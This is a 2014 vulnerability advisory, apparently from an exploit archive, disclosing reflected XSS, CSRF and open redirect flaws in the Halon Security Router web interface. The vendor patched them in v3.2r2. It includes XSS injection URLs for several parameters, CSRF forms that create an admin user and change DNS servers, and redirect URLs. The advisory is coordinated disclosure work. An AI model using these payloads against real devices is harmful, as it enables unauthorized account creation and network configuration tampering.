Halon Security Router XSS / CSRF / Open Redirect

Halon Security Router XSS / CSRF / Open Redirect: Posted Apr 8, 2014; Authored by Juan Manuel Garcia; Halon Security Router suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 6a89ccc532c3b03e26dc887d1ad606c3b5effc18b384765f25f3a06bdd2836bd; Download | Favorite | View

Halon Security Router XSS / CSRF / Open Redirect

ADVISORY INFORMATION
Advisory Name: Multiple Security Vulnerabilities in Halon Security Router
Date published: 2014-04-07
Vendors contacted: Halon Security (http://www.halon.se)
Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)
 
 
 
VULNERABILITIES INFORMATION
Vulnerabilities:
1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}
2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}
3. Open Redirect {OWASP Top 10 2013-A10}
 
Severities:
1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.
 
Affected Platforms: Software, virtual and hardware
 
Local / Remote: Remote
 
Vendor Status: Patched
 
 
 
VULNERABILITIES DESCRIPTION
1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
3. Open Redirect: https://www.owasp.org/index.php/Open_redirect
 
 
 
TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS
1- Reflected XSS:
At least the following parameters are not properly sanitized:
 http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
Parameter: log
 http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
Parameter: file
 http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
Parameter: graph
 http://sr.demo.halon.se/commands/?command='+alert(1)+'
Parameter: command
 http://sr.demo.halon.se/system/users/?id='+alert(1)+'
Parameter: id
 http://sr.demo.halon.se/config/?uri='+alert(1)+'
Parameter: uri
Other parameters of the application might also be affected.
 
 
2- CSRF:
At least the following functions are vulnerable:
 Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user
 
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="old_user" value=""/>
<input type="hidden" name="user" value="hacker"/>
<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
<input type="hidden" name="class" value=""/>
<input type="hidden" name="password" value="1234"/>
<input type="hidden" name="password2" value="1234"/>
</form>
</body>
</html>
 
DNS configuration: http://xxx.xxx.xxx.xxx/network/dns
 
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/network/dns/">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="name-servers" value="8.8.8.8"/>
<input type="hidden" name="search-domain" value=""/>
<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
</form>
</body>
</html>
 
 Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
 Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
 VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
 Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
Other functions of the application might also be affected.
 
 
3- Open Redirect:
At least the following parameters are not properly sanitized:
 http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
Parameter: uri
 http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
Parameter: uri
Other parameters of the application might also be affected.
 
 
 
SOLUTION
Install / Upgrade to Security router (SR) v3.2r2
REPORT TIMELINE
 
2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.
2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.
2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.
2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.
2014-04-07: IT Force published the advisory.
 
 
 
CONTACT INFORMATION
www.itforce.tk

Top Authors In Last 30 Days

Red Hat 239 files
indoushka 139 files
Ubuntu 79 files
Gentoo 33 files
Debian 26 files
Sebastian Hamann 8 files
Jann Horn 7 files
Google Security Research 6 files
Moritz Abrell 6 files
Jaggar Henry 6 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,110)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,941)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,657)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,783)
UNIX (9,443)
UnixWare (187)
Windows (6,679)
Other

Halon Security Router XSS / CSRF / Open Redirect

Halon Security Router XSS / CSRF / Open Redirect

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Halon Security Router XSS / CSRF / Open Redirect

Share This

Halon Security Router XSS / CSRF / Open Redirect

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems